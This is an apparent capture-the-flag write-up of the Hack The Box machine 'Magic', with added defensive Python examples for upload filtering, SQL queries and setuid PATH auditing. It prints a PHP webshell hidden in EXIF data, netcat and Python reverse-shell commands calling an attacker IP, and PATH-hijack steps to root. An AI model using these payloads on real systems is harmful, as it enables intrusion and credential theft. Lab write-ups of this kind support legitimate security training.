HTB Write-up | Magic

Retired machine can be found here.

Scanning

As always, we start with some basic scanning which discloses only an instance of OpenSSH running on port 22 and an Apache web server running on port 80 - pretty typical stuff.

~ nmap -sV -sC -A magic.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-09 15:10 WEST
Nmap scan report for magic.htb (10.10.10.185)
Host is up (0.046s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.89 seconds

The website is just a simple image gallery, but there is a link to a login form on the bottom left.

Bypassing authentication was pretty straightforward with SQL Injection - I think this was my first attempt.

Once the login succeeds, we're redirected to an Upload page.

Bypassing Upload Filters

This upload feature only accepts JPG, JPEG or PNG files. This is validated by checking both file extension and MIME type, so uploading a PHP script directly is out of the question.

To get around these restrictions I ended up following this tutorial:

1. Create a script that lets us execute any command on the machine, with the help of the passthru function:

Source: https://medium.com/bugbountywriteup/hackthebox-networked-93ebbd6a70e3

2. Embed the script in a valid image using steghide:

$ steghide embed -cf dog.jpg -ef shell.php

3. Manipulate the EXIF data:

$ exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' dog.jpg

4. Change the file extension:

$ mv dog.jpg dog.php.jpg

Finally, we get an RCE, which we use to get a reverse shell:

http://10.10.10.185/images/uploads/dog.php.jpg?cmd=./nc%2010.10.15.114%204444%20-e%20/bin/sh
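The upload filter above fails for two reasons: it checks the extension and MIME type but never the position of the extension, and Apache configured with AddHandler for .php treats dog.php.jpg as a PHP script, so a payload planted in the EXIF comment gets executed. The following is an added example written for this write-up, not code from the Magic box or its author, showing how an upload handler would close both holes: accept only a single allow-listed extension, verify the magic bytes, store under a server-chosen name, and strip the JPEG metadata segments (APP1 to APP15 and COM) where a text payload like the exiftool comment lives. The sample JPEG is constructed for the demo and is not a decodable image.

```python
import os
import re
import secrets
import struct

# Allowed extensions and the magic bytes the file content must start with.
ALLOWED = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n"}


def check_upload(filename, data):
    """Return (ok, detail). Rejects dotted names such as dog.php.jpg outright, because
    Apache configured with `AddHandler ... .php` matches .php in ANY position of the name;
    then requires the single extension to be allow-listed and the content to match it."""
    base = os.path.basename(filename.replace("\\", "/"))   # drop any directory part
    parts = base.lower().split(".")
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]+", parts[0]):
        return False, "filename must be name.ext with exactly one extension"
    ext = parts[1]
    if ext not in ALLOWED:
        return False, "extension ." + ext + " is not allowed"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match the declared image type"
    return True, ext


def server_side_name(ext):
    """Never keep the client's filename: store under a random name with the vetted extension."""
    return secrets.token_hex(16) + "." + ext


def strip_jpeg_metadata(data):
    """Walk the JPEG marker segments and drop APP1..APP15 and COM (EXIF, XMP, comments).
    Segments needed for decoding (DQT, SOF, DHT, APP0) are kept; from SOS on, the scan data
    is copied through up to the first EOI, which also discards anything appended after it."""
    if not data.startswith(b"\xff\xd8"):
        raise ValueError("not a JPEG")
    out = bytearray(b"\xff\xd8")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected a marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xD9:                       # EOI before any scan: nothing more to copy
            out += b"\xff\xd9"
            return bytes(out)
        if marker == 0xDA:                       # SOS: header plus entropy-coded data follow
            end = data.find(b"\xff\xd9", pos)    # 0xFF inside scan data is always stuffed, so
            if end == -1:                        # the first FF D9 after SOS is the real EOI
                raise ValueError("missing EOI")
            out += data[pos:end + 2]
            return bytes(out)
        if pos + 4 > len(data):
            break
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if not (marker in range(0xE1, 0xF0) or marker == 0xFE):   # keep non-metadata segments
            out += data[pos:pos + 2 + length]
        pos += 2 + length
    raise ValueError("truncated JPEG")


def _seg(marker, payload):
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed minimal JPEG-shaped file: JFIF header, a COM segment carrying a PHP tag the way
# the exiftool step plants one, a quantisation-table stub, then SOS, scan bytes and EOI.
SAMPLE_JPEG = (
    b"\xff\xd8"
    + _seg(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _seg(0xFE, b"<?php /* planted payload */ ?>")
    + _seg(0xDB, b"\x00" + bytes(64))
    + _seg(0xDA, b"\x01\x01\x00\x00\x3f\x00")
    + b"\x12\x34\x56"
    + b"\xff\xd9"
)

if __name__ == "__main__":
    print(check_upload("dog.php.jpg", SAMPLE_JPEG))
    print(check_upload("dog.jpg", SAMPLE_JPEG))
    print(b"<?php" in strip_jpeg_metadata(SAMPLE_JPEG))
```

Two caveats. First, steghide (step 2 above) hides its payload in the DCT coefficients, not in a metadata segment, so segment stripping does not remove it; only decoding and re-encoding the image does, and even then the surviving bytes are inert as long as the web server never runs the upload directory through the PHP handler. Second, the server-side fix matters more than the filter: bind the PHP handler with a FilesMatch on "\.php$" rather than AddHandler, and set php_admin_flag engine off for the uploads directory so nothing stored there is ever executed.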

Getting User

Authenticated as www-data, we start poking around the web server files and find the credentials for the MySQL database, which then allows us to dump the contents of the app's database (the login table) using the mysqldump binary:

~ /usr/bin/mysqldump --user=theseus --password=iamkingtheseus Magic login > /var/www/Magic/dbdump.sql

~ cat /var/www/Magic/dbdump.sql
...
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
...
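Two application bugs got us this far: the login form splices user input into its SQL query (the authentication bypass earlier), and the login table stores passwords in clear text, so a dump hands over a working credential. The following is an added example written for this write-up, not the portfolio's PHP code, showing the fixed pattern in Python with an in-memory SQLite table standing in for the app's login table (the real schema is unknown): a parameterized lookup that treats input as data, and PBKDF2 hashing so a dump yields only salted hashes. The vulnerable login is kept beside it only for comparison.

```python
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 100_000  # PBKDF2 work factor; raise it on real hardware


def make_db():
    """Constructed in-memory stand-in for the app's `login` table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)")
    return db


def hash_password(password, salt=None):
    """PBKDF2-HMAC-SHA256 with a random salt, stored as 'salt_hex$digest_hex'.
    A dump of the table then yields hashes instead of the clear text seen above."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), ITERATIONS)
    # constant-time comparison so a wrong guess cannot be timed byte by byte
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


DUMMY_HASH = hash_password("unused")  # verified for unknown users so timing is uniform


def add_user(db, username, password):
    db.execute("INSERT INTO login (username, password) VALUES (?, ?)",
               (username, hash_password(password)))


def login_vulnerable(db, username, password):
    """The bug class behind the portfolio's login: user input is spliced into SQL text,
    so the WHERE clause can be rewritten by the client. Kept only for comparison."""
    query = ("SELECT id FROM login WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return db.execute(query).fetchone() is not None


def login_safe(db, username, password):
    """Parameterized lookup: the driver binds the ? value as data, never as SQL.
    The password is then checked against the stored hash, not compared inside the query."""
    row = db.execute("SELECT password FROM login WHERE username = ?", (username,)).fetchone()
    if row is None:
        verify_password(password, DUMMY_HASH)
        return False
    return verify_password(password, row[0])


def demo():
    """Exercise both login paths with a constructed account and the classic tautology input."""
    db = make_db()
    add_user(db, "admin", "Th3s3usW4sK1ng")   # credential from the dump above, now stored hashed
    tautology = "' OR '1'='1"
    dump = str(db.execute("SELECT password FROM login").fetchall())
    return {
        "vulnerable_bypassed": login_vulnerable(db, "admin", tautology),
        "safe_bypassed": login_safe(db, "admin", tautology),
        "safe_real_login": login_safe(db, "admin", "Th3s3usW4sK1ng"),
        "dump_has_cleartext": "Th3s3usW4sK1ng" in dump,
    }


if __name__ == "__main__":
    print(demo())
```

The same two changes would have broken the chain on this box twice: the tautology input no longer satisfies the parameterized query, and a later mysqldump of the login table gives the attacker a salted hash to crack instead of the su password.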

We now have credentials for the user theseus, but since SSH access is only enabled with RSA keys we need to upgrade our shell to an interactive one before we can authenticate with them.

http://10.10.10.185/images/uploads/dog.php.jpg?cmd=/usr/bin/python3 -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.52",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

With this interactive shell we can now authenticate via su.

www-data@ubuntu:/var/www/Magic/images/uploads$ su - theseus
Password: Th3s3usW4sK1ng
theseus@ubuntu:~$ 

Path to Root

Root was a lot more straightforward. We started by running SUID3NUM which found only one noteworthy file - /bin/sysinfo - so we investigate it.

~ strings /bin/sysinfo
...
setuid
...
====================Hardware Info====================
lshw -short
...

As we can see above, the binary calls setuid at one point and right after prints the output of lshw (list hardware). The command is invoked as a bare "lshw -short" with no absolute path, so it is resolved through $PATH: by prepending a directory we control, we can get root to run our fake lshw instead of the real binary, and our fake lshw prints out the root flag:

theseus@ubuntu:~$ mkdir /tmp/.abc
theseus@ubuntu:~$ export PATH=/tmp/.abc:$PATH
theseus@ubuntu:~$ touch /tmp/.abc/lshw
theseus@ubuntu:~$ echo "cat /root/root.txt" >> /tmp/.abc/lshw
theseus@ubuntu:~$ chmod 777 /tmp/.abc/lshw

Now we just need to run the sysinfo binary, and the output contains the root flag in place of the lshw output.
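The root step is a PATH hijack: a setuid binary launching a helper by bare name inherits the caller's $PATH. The following is an added example written for this write-up, not the box's sysinfo source or SUID3NUM, showing the two things a defender wants here: an offline audit that extracts strings from a binary the way strings does and flags allow-listed tools invoked without an absolute path alongside a setuid reference, and the invocation pattern the helper should have used (absolute path resolved against a fixed PATH, scrubbed environment, no shell). The allow-list KNOWN_TOOLS and the sample byte blob are constructed for the demo; the lookup function defaults to shutil.which and is injectable so the example runs without lshw installed.

```python
import os
import re
import shlex
import shutil

SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"
# Hypothetical allow-list of the helper tools a setuid program may launch.
KNOWN_TOOLS = {"lshw", "df", "free", "uname"}


def printable_strings(blob, min_len=4):
    """Mimic the `strings` utility: runs of printable ASCII of at least min_len bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def audit_binary(blob):
    """Flag embedded command lines that name an allow-listed tool without an absolute path
    (so it would be resolved through the caller's PATH), and note whether the binary
    references setuid at all. Works on raw bytes so it runs offline."""
    strings = printable_strings(blob)
    unqualified = []
    for s in strings:
        try:
            argv = shlex.split(s)
        except ValueError:          # unbalanced quotes: not a command line
            continue
        if argv and "/" not in argv[0] and argv[0] in KNOWN_TOOLS:
            unqualified.append(s)
    return {"mentions_setuid": "setuid" in strings, "unqualified_commands": unqualified}


def build_safe_command(tool, *args, lookup=shutil.which):
    """What the helper should do instead of system("lshw -short"): resolve the tool against a
    fixed PATH, pass an absolute argv[0], and hand the child a scrubbed environment.
    Returns (argv, env) ready for subprocess.run(argv, env=env, shell=False)."""
    if tool not in KNOWN_TOOLS:
        raise ValueError("tool %r is not allow-listed" % tool)
    path = lookup(tool, path=SAFE_PATH)
    if path is None or not os.path.isabs(path):
        raise FileNotFoundError("%s not found on %s" % (tool, SAFE_PATH))
    return [path, *args], {"PATH": SAFE_PATH}


# Constructed byte blob shaped like the strings output above (not the real /bin/sysinfo).
SAMPLE_BINARY = (
    b"\x7fELF" + bytes(12)
    + b"setuid\x00"
    + b"====================Hardware Info====================\x00"
    + b"lshw -short\x00"
    + b"/usr/bin/df -h\x00"
    + b"uname -a\x00"
)

if __name__ == "__main__":
    print(audit_binary(SAMPLE_BINARY))
    print(build_safe_command("lshw", "-short", lookup=lambda cmd, path: "/usr/bin/" + cmd))
```

On a live host the audit loop would read each setuid file found by find / -perm -4000 and run audit_binary on its bytes; a hit like "lshw -short" next to a setuid reference is exactly the sysinfo pattern. For detection after the fact, a process-execution log showing a root-owned process whose executable lives under /tmp, as in the hijack above, is the signal to alert on.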